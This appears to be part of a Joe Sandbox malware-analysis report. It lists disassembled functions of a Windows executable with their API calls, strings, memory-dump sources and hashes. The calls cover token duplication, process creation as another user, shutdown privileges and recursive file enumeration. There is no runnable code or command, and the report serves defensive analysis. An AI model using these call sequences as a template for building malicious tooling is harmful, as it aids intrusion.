                                                                                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                              Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                              • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                              • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                              • _wcslen.LIBCMT ref: 00446498
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • _wcsncpy.LIBCMT ref: 004464C0
                                                                                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                              • CloseDesktop.USER32(?), ref: 0044657A
                                                                                              • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                              • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                              • String ID: $@OH$default$winsta0
                                                                                              • API String ID: 3324942560-3791954436
                                                                                              • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                              • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                              Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                              • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                              • __swprintf.LIBCMT ref: 004789D3
                                                                                              • __swprintf.LIBCMT ref: 00478A1D
                                                                                              • __swprintf.LIBCMT ref: 00478A4B
                                                                                              • __swprintf.LIBCMT ref: 00478A79
                                                                                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                              • __swprintf.LIBCMT ref: 00478AA7
                                                                                              • __swprintf.LIBCMT ref: 00478AD5
                                                                                              • __swprintf.LIBCMT ref: 00478B03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 999945258-2428617273
                                                                                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                              Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                              • __wsplitpath.LIBCMT ref: 00403492
                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                              • _wcscpy.LIBCMT ref: 004034A7
                                                                                              • _wcscat.LIBCMT ref: 004034BC
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                              • _wcscpy.LIBCMT ref: 004035A0
                                                                                              • _wcslen.LIBCMT ref: 00403623
                                                                                              • _wcslen.LIBCMT ref: 0040367D
                                                                                              Strings
                                                                                              • Error opening the file, xrefs: 00428231
                                                                                              • _, xrefs: 0040371C
                                                                                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                              • Unterminated string, xrefs: 00428348
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                              • API String ID: 3393021363-188983378
                                                                                              • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                              • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                              Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                              • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                              • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1409584000-438819550
                                                                                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                              Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                              • __swprintf.LIBCMT ref: 00431C2E
                                                                                              • _wcslen.LIBCMT ref: 00431C3A
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 2192556992-3457252023
                                                                                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                              Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                              • __swprintf.LIBCMT ref: 004722B9
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderPath$LocalTime__swprintf
                                                                                              • String ID: %.3d
                                                                                              • API String ID: 3337348382-986655627
                                                                                              • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                              • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                              Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                              • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                              • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                              • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2640511053-438819550
                                                                                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                              Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                              • GetLastError.KERNEL32 ref: 00433414
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 2938487562-3733053543
                                                                                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                              Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                              • String ID:
                                                                                              • API String ID: 1255039815-0
                                                                                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                              Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __swprintf.LIBCMT ref: 00433073
                                                                                              • __swprintf.LIBCMT ref: 00433085
                                                                                              • __wcsicoll.LIBCMT ref: 00433092
                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                              • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                              • LockResource.KERNEL32(?), ref: 00433120
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                              • String ID:
                                                                                              • API String ID: 1158019794-0
                                                                                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                              Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
